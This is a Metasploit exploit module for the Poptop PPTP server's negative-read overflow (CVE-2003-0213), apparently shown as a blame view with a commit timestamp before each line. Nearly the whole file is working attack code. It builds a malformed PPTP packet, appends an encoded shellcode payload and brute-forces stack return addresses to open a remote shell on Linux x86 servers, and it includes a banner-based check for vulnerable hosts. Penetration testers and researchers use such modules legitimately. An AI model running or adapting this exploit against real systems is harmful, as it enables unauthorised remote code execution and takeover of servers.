2007-02-18 00:10:39 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2007-02-18 00:10:39 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = GreatRanking
2013-08-30 16:28:54 -05:00
2008-10-02 05:23:59 +00:00
include Msf :: Exploit :: Remote :: Tcp
include Msf :: Exploit :: Remote :: Brute
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
def initialize ( info = { } )
2025-06-12 21:14:25 +10:00
super (
update_info (
info ,
'Name' = > 'Poptop Negative Read Overflow' ,
'Description' = > %q{
2010-04-30 08:40:19 +00:00
This is an exploit for the Poptop negative read overflow. This will
2025-06-12 21:14:25 +10:00
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
currently do not have a good way to detect Poptop versions.
The server will by default only allow 4 concurrent manager processes
(what we run our code in), so you could have a max of 4 shells at once.
Using the current method of exploitation, our socket will be closed
before we have the ability to run code, preventing the use of Findsock.
} ,
'Author' = > 'spoonm' ,
'License' = > MSF_LICENSE ,
'References' = > [
2009-07-16 16:02:24 +00:00
[ 'CVE' , '2003-0213' ] ,
2016-07-15 12:00:31 -05:00
[ 'OSVDB' , '3293' ] ,
2025-06-12 21:14:25 +10:00
[ 'URL' , 'https://web.archive.org/web/20210120064041/http://securityfocus.com/archive/1/317995' ] ,
[ 'URL' , 'https://web.archive.org/web/20061215104830/http://www.freewebs.com/blightninjas/' ] ,
2007-01-28 19:02:22 +00:00
] ,
2025-06-12 21:14:25 +10:00
'Privileged' = > true ,
'Payload' = > {
2007-01-28 19:02:22 +00:00
# Payload space is dynamically determined
2025-06-12 21:14:25 +10:00
'MinNops' = > 16 ,
2009-11-24 19:35:05 +00:00
'StackAdjustment' = > - 1088 ,
2025-06-12 21:14:25 +10:00
'Compat' = > {
'ConnectionType' = > '-find'
}
2007-01-28 19:02:22 +00:00
} ,
2025-06-12 21:14:25 +10:00
'SaveRegisters' = > [ 'esp' ] ,
'Platform' = > 'linux' ,
'Arch' = > ARCH_X86 ,
'Targets' = > [
[
'Linux Bruteforce' ,
{
'Bruteforce' = > {
'Start' = > { 'Ret' = > 0xbffffa00 } ,
'Stop' = > { 'Ret' = > 0xbffff000 } ,
'Step' = > 0
2007-01-28 19:02:22 +00:00
}
}
] ,
] ,
2025-06-12 21:14:25 +10:00
'DefaultTarget' = > 0 ,
'DisclosureDate' = > '2003-04-09' ,
'Notes' = > {
'Stability' = > [ CRASH_SERVICE_DOWN ] ,
'SideEffects' = > [ IOC_IN_LOGS ] ,
'Reliability' = > [ REPEATABLE_SESSION ]
}
)
)
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
register_options (
[
Opt :: RPORT ( 1723 )
2025-06-12 21:14:25 +10:00
]
)
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
register_advanced_options (
[
2025-06-12 21:14:25 +10:00
OptInt . new ( 'PreReturnLength' , [ true , 'Space before we hit the return address. Affects PayloadSpace.' , 220 ] ) ,
OptInt . new ( 'RetLength' , [ true , 'Length of returns after payload.' , 32 ] ) ,
OptInt . new ( 'ExtraSpace' , [
true ,
'The exploit builds two protocol frames, the header frame and the control frame. ' \
'ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). ' \
" If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " \
" (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested. " ,
0
] ) ,
OptString . new ( 'Hostname' , [ false , 'PPTP Packet hostname' , '' ] ) ,
OptString . new ( 'Vendor' , [ true , 'PPTP Packet vendor' , 'Microsoft Windows NT' ] ) ,
]
)
2007-01-28 19:02:22 +00:00
end
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
# Dynamic payload space calculation
2025-06-12 21:14:25 +10:00
def payload_space ( _explicit_target = nil )
2007-01-30 04:11:14 +00:00
datastore [ 'PreReturnLength' ] . to_i + datastore [ 'ExtraSpace' ] . to_i
2007-01-28 19:02:22 +00:00
end
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
def build_packet ( length )
[ length , 1 , 0x1a2b3c4d , 1 , 0 ] . pack ( 'nnNnn' ) +
2025-06-12 21:14:25 +10:00
[ 1 , 0 ] . pack ( 'cc' ) +
2010-11-23 18:12:08 +00:00
[ 0 ] . pack ( 'n' ) +
2025-06-12 21:14:25 +10:00
[ 1 , 1 , 0 , 2600 ] . pack ( 'NNnn' ) +
2010-11-23 18:12:08 +00:00
datastore [ 'Hostname' ] . ljust ( 64 , " \x00 " ) +
datastore [ 'Vendor' ] . ljust ( 64 , " \x00 " )
2007-01-28 19:02:22 +00:00
end
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
def check
connect
sock . put ( build_packet ( 156 ) )
2009-11-25 02:01:27 +00:00
res = sock . get_once
2013-08-30 16:28:54 -05:00
2025-06-12 21:14:25 +10:00
if res && res =~ / MoretonBay /
2010-11-23 18:12:08 +00:00
return CheckCode :: Detected
2007-01-28 19:02:22 +00:00
end
2013-08-30 16:28:54 -05:00
2025-06-12 21:14:25 +10:00
CheckCode :: Safe
2007-01-28 19:02:22 +00:00
end
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
def brute_exploit ( addrs )
connect
2013-08-30 16:28:54 -05:00
2025-06-12 21:14:25 +10:00
print_status ( " Trying #{ '%.8x' % addrs [ 'Ret' ] } ... " )
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
# Construct the evil length packet
2010-04-30 08:40:19 +00:00
packet =
2007-01-28 19:02:22 +00:00
build_packet ( 1 ) +
payload . encoded +
( [ addrs [ 'Ret' ] ] . pack ( 'V' ) * ( datastore [ 'RetLength' ] / 4 ) )
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
sock . put ( packet )
2013-08-30 16:28:54 -05:00
2007-01-28 19:02:22 +00:00
handler
disconnect
end
2009-07-16 16:02:24 +00:00
end
